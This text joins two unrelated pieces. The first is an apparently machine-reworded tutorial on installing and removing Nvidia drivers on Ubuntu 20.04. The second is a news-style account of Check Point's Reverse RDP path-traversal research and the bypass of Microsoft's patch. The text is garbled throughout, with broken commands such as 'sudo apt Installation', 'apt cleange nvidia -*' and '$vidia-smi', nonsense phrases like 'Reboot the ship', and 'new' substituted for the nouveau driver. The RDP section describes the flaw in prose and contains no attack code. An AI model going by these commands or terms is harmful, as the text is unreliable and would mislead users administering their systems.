At the top of the Software and Updates window you will find a number of options that are displayed, including Ubuntu software, other software, updates, and so on. In this case, click on the Additional drivers button and you will see that the Nvidia -435 driver (proprietary, tested) has been configured as the default driver for the Nvidia card and that some proprietary drivers are listed.

Both Nvidia – 430 (own) and Nvidia – 390 (own) drivers are available for the GeForce GTX 1080 Ti card. Select the first option to install the Nvidia 430 driver.  When finished, click Apply Changes to install the driver.

Then wait until the Internet download is complete and click on the Close button.

Restart the computer for the changes to take effect. Start the next one to restart the computer.

$ sudo shutdown -r now

or

Reboot the ship

Installation of the Nvidia Command Line Driver (CLI)

Then execute the following commands to check the list of available drivers for the Nvidia card in the standard Ubuntu repository.

Ubuntu driver boot

Four Nvidia drivers are available for the GeForce MX130. These include the non-free Nvidia -440 driver (recommended for Ubuntu systems), the non-free Nvidia -435 and -390 distribution drivers and the new open source graphics driver (standard). You can now execute the following commands to install the desired driver.

driver car installation sudo ubuntu driver

$ sudo apt Installation nvidia-driver-390

Once Nvidia Diver is installed, you will need to restart your computer so that Nvidia prime (the technology) can switch from Intel Graphics to the Nvidia graphics card.

$ sudo shutdown -r now

Test with nvidia-smi

The nvidia-smi command line is a utility used to provide monitoring and management functions for any device, i.e. Nvidia Tesla, GRID, Quadro and GeForce from Fermi and other superior architecture families. Open the Terminal application and execute the following command to display the GPU and the process using the Nvidia GPU

$vidia-smi

Nvidia Graphicsdriver configuration

Use the Nvidia Setup command to start the Graphics User Interface (GUI) tool to configure the Nvidia Graphics Driver. This allows you to view all the information on the GPU and even configure multiple external monitors connected to your system. To start the Nvidia window and the server settings, execute the following command.

Shipsnidia parameters

How do I remove my own Nvidiadriver?

In the open forums I found that many users have problems uninstalling and reinstalling Nvidia drivers. Let me tell you about the steps I followed to successfully remove the Nvidia driver and switch to the new driver.

Step one: Run the following commands to uninstall Nvidia’s own driver.

$ sudo dpkg -p $(dpkg -l | grep nvidia-driver | awk ‘{print $2}’)
$ sudo apt autoremove
or $ sudo apt cleange nvidia -*

Step two: Execute these commands to return to the new driver.

$ sudo apt installation xserver-xorg-video-new

You can probably also switch to the new driver directly from the GUI. In the Software and Update application, select the option Additional drivers. Then select the new rich display driver and click on Apply Changes.

Step three: Then restart the system.

$ sudo shutdown -r now

Step four: After rebooting the system, run the following command to confirm that the new rich module is loaded.

$ lsmod | grep new

Conclusion

In this tutorial we have studied two ways to install Nvidia drivers on Ubuntu 20.04 LTS.

In this context, Nvidia Vulkan, which should provide better performance and a more balanced CPU/GPU driver for Linux, is replacing OpenGL.

In recent years, Redhat developers have added extra code to the New Open Source code to make it much better, and we hope to be able to use it in a modern game in the near future.

If you have any questions or comments, please leave your questions.

Reverse RDP attacks

Think of the Reverse RDP attack – where a client system vulnerable to path-bypass vulnerability can be compromised when accessing the server remotely via the Microsoft Remote Desktop protocol?

Although Microsoft determined the vulnerability (CVE-2019-0887) in its July 2019 update on Tuesday, it appeared that researchers were able to work around the patch by simply replacing backslashes with slashes on the front.

Microsoft recognized the unsuitable patch and corrected the error in its February 2020 update earlier this year, which is now traceable as CVE-2020-0655.

In the latest report from The Hacker News, the Check Point investigator said Microsoft solved the problem by adding a separate workaround to Windows, leaving the root of the workaround, the PathCchCanonicalize API, unchanged.

Clearly, the built-in RDP client workaround works well in Windows operating systems, but the patch is not secure enough to protect other third-party RDP clients from the same attack, based on Microsoft’s vulnerability fumigation feature.

We discovered that an attacker can not only bypass a Microsoft patch, but can also bypass any canonization check performed according to Microsoft best practices, says Check Point investigator Eyal Itkin in a report published in Hacker News.

For those who don’t know: Path bypass attacks occur when the program receiving the file does not check it. This allows the attacker to store the file in any selected location on the target system, exposing the content of the files outside the application’s root directory.

A remote computer infected with malware can take control of any client trying to connect. For example, if an IT employee tries to connect to an external company computer that has been infected with malware, the malicious code may also attack the IT employee’s computer, as described by the investigators.

There were gaps last year, and later studies in August showed that they also affected Microsoft’s Hyper-V hardware virtualization platform.

Here is a demonstration video of last year’s original vulnerability:

 

Trackerror incorrectly corrected

According to the investigators, the July patch can be bypassed because of a problem with its PathCchCanonicalize feature, which is used to disinfect file paths and allows an attacker to use client-server clipboard synchronization to reset random files on the client computer.

In other words, if the clipboard is used when connecting to a compromised RDP server, the server can use the shared RDP clipboard to send files to the client computer and execute code remotely.

Although the gate researchers initially confirmed that the engagement was in line with our initial expectations, this seems to be more than it seems at first glance: A patch can easily be bypassed by replacing backslashes (e.g. phylolocution) in paths with straight slashes (e.g. file/k/location), which traditionally serve as path separators in Unix systems.

It seems that PathCchCanonicalize, a feature mentioned in the Windows best practices guide for canonizing the enemy path, has already previously ignored the slash, Itkin said. We verified this behavior by reverse engineering a Microsoft function implementation, discovering that it cuts the path to pieces, only searches and ignores.

Reverse RDP attack

The cyber security company said it found an error in its attempt to investigate the Microsoft Remote Desktop for Mac client, an RDP client that was excluded from its initial analysis last year. It is interesting to note that the macOS RDP client itself is not vulnerable to CVE-2019-0887.

Since the main vulnerability is still unresolved, Check Point warned that the consequences of simply bypassing the main Windows path cleaning feature poses serious risks to many other software that may be affected.

Microsoft has failed to fix the vulnerability in its official API, so all programs written according to Microsoft’s best practices are still vulnerable to attacks such as path crossing, said Omri Herscovici of Check Point. We want developers to be aware of this threat so that they can view their programs and patch them manually.